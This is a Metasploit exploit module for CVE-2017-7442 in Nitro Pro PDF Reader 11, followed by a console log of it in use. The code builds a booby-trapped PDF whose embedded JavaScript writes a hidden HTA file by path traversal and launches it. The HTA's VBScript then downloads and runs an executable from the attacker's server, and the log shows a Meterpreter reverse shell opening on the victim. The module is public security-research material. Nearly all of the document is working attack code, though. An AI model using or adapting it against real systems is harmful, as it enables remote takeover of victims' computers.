Nitro Pro PDF Reader 11.0.3.173 Remote Code Execution

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Exploit::FileDropper  
include Msf::Exploit::FILEFORMAT  
include Msf::Exploit::EXE  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',  
'Description' => %q{  
This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro  
PDF Reader version 11. The saveAs() Javascript API function allows for writing  
arbitrary files to the file system. Additionally, the launchURL() function allows  
an attacker to execute local files on the file system and bypass the security dialog  
  
Note: This is 100% reliable.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'mr_me <steven[at]srcincite.io>', # vulnerability discovery and exploit  
'Brendan Coles <bcoles [at] gmail.com>', # hidden hta tricks!  
'sinn3r' # help with msf foo!  
],  
'References' =>  
[  
[ 'CVE', '2017-7442' ],  
[ 'URL', 'http://srcincite.io/advisories/src-2017-0005/' ], # public advisory #1  
[ 'URL', 'https://blogs.securiteam.com/index.php/archives/3251' ], # public advisory #2 (verified and acquired by SSD)  
],  
'DefaultOptions' =>  
{  
'DisablePayloadHandler' => false  
},  
'Platform' => 'win',  
'Targets' =>  
[  
# truly universal  
[ 'Automatic', { } ],  
],  
'DisclosureDate' => 'Jul 24 2017',  
'DefaultTarget' => 0))  
  
register_options([  
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),  
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),  
])  
deregister_options('SSL', 'SSLVersion', 'SSLCert')  
end  
  
def build_vbs(url, stager_name)  
name_xmlhttp = rand_text_alpha(2)  
name_adodb = rand_text_alpha(2)  
vbs = %Q|<head><hta:application  
applicationname="#{@payload_name}"  
border="none"  
borderstyle="normal"  
caption="false"  
contextmenu="false"  
icon="%SystemRoot%/Installer/{7E1360F1-8915-419A-B939-900B26F057F0}/Professional.ico"  
maximizebutton="false"  
minimizebutton="false"  
navigable="false"  
scroll="false"  
selection="false"  
showintaskbar="No"  
sysmenu="false"  
version="1.0"  
windowstate="Minimize"></head>  
<style>* { visibility: hidden; }</style>  
<script language="VBScript">  
window.resizeTo 1,1  
window.moveTo -2000,-2000  
</script>  
<script type="text/javascript">setTimeout("window.close()", 5000);</script>  
<script language="VBScript">  
On Error Resume Next  
Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")  
#{name_xmlhttp}.open "GET","http://#{url}",False  
#{name_xmlhttp}.send  
Set #{name_adodb} = CreateObject("ADODB.Stream")  
#{name_adodb}.Open  
#{name_adodb}.Type=1  
#{name_adodb}.Write #{name_xmlhttp}.responseBody  
#{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2  
set shellobj = CreateObject("wscript.shell")  
shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0  
</script>|  
vbs.gsub!(/ /,'')  
return vbs  
end  
  
def on_request_uri(cli, request)  
if request.uri =~ /\.exe/  
print_status("Sending second stage payload")  
return if ((p=regenerate_payload(cli)) == nil)  
data = generate_payload_exe( {:code=>p.encoded} )  
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )  
return  
end  
end  
  
def exploit  
# In order to save binary data to the file system the payload is written to a .vbs  
# file and execute it from there.  
@payload_name = rand_text_alpha(4)  
@temp_folder = "/Windows/Temp"  
register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")  
if datastore['SRVHOST'] == '0.0.0.0'  
lhost = Rex::Socket.source_address('50.50.50.50')  
else  
lhost = datastore['SRVHOST']  
end  
payload_src = lhost  
payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"  
stager_name = rand_text_alpha(6) + ".vbs"  
pdf = %Q|%PDF-1.7  
4 0 obj  
<<  
/Length 0  
>>  
stream  
|  
pdf << build_vbs(payload_src, stager_name)  
pdf << %Q|  
endstream endobj  
5 0 obj  
<<  
/Type /Page  
/Parent 2 0 R  
/Contents 4 0 R  
>>  
endobj  
1 0 obj  
<<  
/Type /Catalog  
/Pages 2 0 R  
/OpenAction [ 5 0 R /Fit ]  
/Names <<  
/JavaScript <<  
/Names [ (EmbeddedJS)  
<<  
/S /JavaScript  
/JS (  
this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');  
app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');  
)  
>>  
]  
>>  
>>  
>>  
endobj  
2 0 obj  
<</Type/Pages/Count 1/Kids [ 5 0 R ]>>  
endobj  
3 0 obj  
<<>>  
endobj  
xref  
0 6  
0000000000 65535 f  
0000000166 00000 n  
0000000244 00000 n  
0000000305 00000 n  
0000000009 00000 n  
0000000058 00000 n  
trailer <<  
/Size 6  
/Root 1 0 R  
>>  
startxref  
327  
%%EOF|  
pdf.gsub!(/ /,'')  
file_create(pdf)  
super  
end  
end  
  
=begin  
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc  
[*] Processing scripts/nitro.rc for ERB directives.  
resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi  
resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp  
payload => windows/meterpreter/reverse_tcp  
resource (scripts/nitro.rc)> set LHOST 172.16.175.1  
LHOST => 172.16.175.1  
resource (scripts/nitro.rc)> exploit  
[*] Exploit running as background job.  
  
[*] Started reverse TCP handler on 172.16.175.1:4444   
msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf  
[*] Using URL: http://0.0.0.0:8080/  
[*] Local IP: http://192.168.100.4:8080/  
[*] Server started.  
[*] 192.168.100.4 nitro_reader_jsapi - Sending second stage payload  
[*] Sending stage (957487 bytes) to 172.16.175.232  
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500  
[+] Deleted C:/Windows/Temp/UOIr.hta  
  
msf exploit(nitro_reader_jsapi) > sessions -i 1  
[*] Starting interaction with 1...  
  
meterpreter > shell  
Process 2412 created.  
Channel 2 created.  
Microsoft Windows [Version 6.1.7601]  
Copyright (c) 2009 Microsoft Corporation. All rights reserved.  
  
C:\Users\researcher\Desktop>  
=end  
`